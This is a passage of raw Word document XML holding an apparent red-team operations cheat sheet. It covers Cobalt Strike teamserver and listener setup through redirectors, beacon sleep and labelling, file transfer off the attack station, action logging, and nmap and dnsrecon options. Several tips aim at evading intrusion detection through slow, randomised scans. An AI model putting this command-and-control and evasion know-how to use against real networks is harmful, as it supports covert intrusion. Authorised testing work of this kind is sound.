    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>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./teamserver &lt;AttackBoxIP&gt; &lt;password&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">:C2 profile path and date </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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&lt;/path/to/C2/profile&gt; &lt;datetokillbeacons&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">to kill beacons is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:ind w:left="4320" w:firstLine="0"/>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Optional. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Never</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use special characters in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:ind w:left="4320" w:firstLine="0"/>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the password. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>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70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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72">
      <w:pPr>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./cobaltstrike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow the GUI to login providing port, handle, IP of teamserver, password for teamserver, and the default high port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a listener. Set the name to &lt;RedirectIP&gt;_&lt;TransProtocol&gt;. Use the redirector IP for every IP blank.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Test the setup. Create a binary using the given listener and place it on a test machine on the local network. Make sure the callback reaches through the redirector to the cobalt strike client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g1p6ce93bkcm" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleep Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>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Set beacons to sleep from 45s to 60s when interacting with a target. If not interacting, move the sleep time to over 5 minutes or to whatever the situation demands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aps166rglyzk" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notes and Labeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Keep SMB callbacks together in your list and label them ‘Active | &lt;PID of HTTPS Link&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Label live callbacks with ‘Active | &lt;sleeptime&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Label dead callbacks with ‘zDead’ label</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tapjfxhml504" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Hints</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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Chain symbol next to the target indicates a linked SMB sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>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In case something needs to be transferred off the attack station, use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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83">
      <w:pPr>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python -m SimpleHTTPServer &lt;Port#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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85">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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This will create a file server so a remote system can extract files from the attack station.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_id8v6u1kib5" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>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Logging is important for each action taken. Create a spreadsheet with the following headings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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89">
      <w:pPr>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Date</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Press Ctrl+; for the date and Ctrl+Shift+; for the </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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exact time to shortcut entering the date and time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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8C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Source IP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:The IP address of the last hop you used before </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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hitting the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>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8F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Destination IP</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:The IP address of the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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91">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Tool Name</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Program used to accomplish the task</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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93">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Filepath + Filename</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:The path and name of the file downloaded, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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uploaded, or manipulated in some way. Also use this field for registry key edits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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96">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Description</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Describe the action taken. Mark the action with </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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the PID of the callback used. Indicate if a new beacon was spawned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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99">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Critical Path</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:The login and credentials needed to perform the </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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action. Input any conditions critical to the success of the action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Status</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Input whether the action was successful or </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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whether a beacon is Up or Down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_66w25739m1df" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j9n8qw4k4365" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="f3f3f3" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rqdo25ylh66d" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="f3f3f3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>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nmap &lt;IPSubnetRange/CID&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Basic nmap syntax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>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ab/>
        <w:t xml:space="preserve">-iL &lt;InputFileName&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Scan IPs, ranges, and ports indicated in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>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-p &lt;port,port,port-port&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Indicates the ports you want to scan. Can</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>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be comma separated or indicate a range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>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-sT</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Uses a full TCP handshake when locating </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>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open ports. Helps evade IDS by looking like a full legit session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>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-oA &lt;NameOfFile&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Outputs to all filetype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>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-T&lt;#&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:For &lt;#&gt;, place a number from 1-5. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>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Recommended to use 1 or 2 if enumerating a watchful target. Numbers indicate scan speed with 1 being the slowest.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Only scan a few ports, 3 to 4, when performing a scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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AE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Do not scan IPs in sequential order, instead pull IPs from the white list, randomize that list in excel, and save this randomized file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hs0l9rnjd7w8" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">??dnsrecon??</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>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python dnsrecon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:ind w:firstLine="720"/>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-r</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:IP range</w:t>
      </w:r>
    </w:p>
